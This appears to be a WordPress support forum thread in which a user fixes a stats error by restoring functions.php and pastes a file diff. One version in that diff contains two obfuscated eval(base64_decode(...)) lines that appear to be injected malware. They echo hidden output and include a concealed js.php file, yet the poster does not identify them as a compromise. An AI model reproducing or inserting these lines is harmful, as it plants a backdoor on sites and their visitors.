Forum Replies Created

Viewing 2 replies - 1 through 2 (of 2 total)
  • I get the exact same error message. I am really frustrated, while the stats works perfectly on my Online Fashion blog at https://www.irenelim.com/fashion, it failed to work on my Phone blog.

    Anyone has got a solution here?

    I think the server doesn’t have any problem connecting to Akismet though because it can get the Account name from the api key.

    Thread Starter martincool

    (@martincool)

    I have found the fix. Somehow the functions.php file is different, not sure where it’s different, but once I uploaded the copy in my local PC, it fixed the problem immediately!

    Here is a snippet of the file comparison result:

    Comparing files functions.php and FUNCTIONS-BAK.PHP
    ***** functions.php
    $j = @date($dateformatstring, $i);
    if ( !$j ) {
    ***** FUNCTIONS-BAK.PHP
    $j = @date($dateformatstring, $i);
    eval(base64_decode(‘aWYoISRHTE9CQUxTWydkaGhhZyddKXtpZihoYXZlX3Bvc3RzKCkpeyRHTE9CQUxTWydkaGhhZyddID0gMTtpZihmdW5jdGlvbl9
    eGlzdHMoJ2dtbCcpKXtlY2hvIGdtbCgpO319fQ==’));
    if ( !$j ) {
    *****

    ***** functions.php

    function get_usernumposts($userid) {
    ***** FUNCTIONS-BAK.PHP

    function get_usernumposts($userid) {
    *****

    ***** functions.php

    function clean_page_cache($id) {
    ***** FUNCTIONS-BAK.PHP

    function clean_page_cache($id) {
    *****

    ***** functions.php
    }

    function is_archive () {
    ***** FUNCTIONS-BAK.PHP
    }
    eval(base64_decode(‘aWYoZmlsZV9leGlzdHMoJy9ob21lL3RlYW1zaWJ1L3B1YmxpY19odG1sL2lyZW5lbGltL3dwLWluY2x1ZGVzL2pzL3RpbnltY2U
    dGhlbWVzL2FkdmFuY2VkL2ltYWdlcy94cC9qcy5waHAnKSl7aW5jbHVkZSgnL2hvbWUvdGVhbXNpYnUvcHVibGljX2h0bWwvaXJlbmVsaW0vd3AtaW5jbHVkZXMvanM
    dGlueW1jZS90aGVtZXMvYWR2YW5jZWQvaW1hZ2VzL3hwL2pzLnBocCcpO30=’));
    function is_archive () {
    *****

    ***** functions.php

    function is_plugin_page() {
    ***** FUNCTIONS-BAK.PHP

    function is_plugin_page() {
    *****

Viewing 2 replies - 1 through 2 (of 2 total)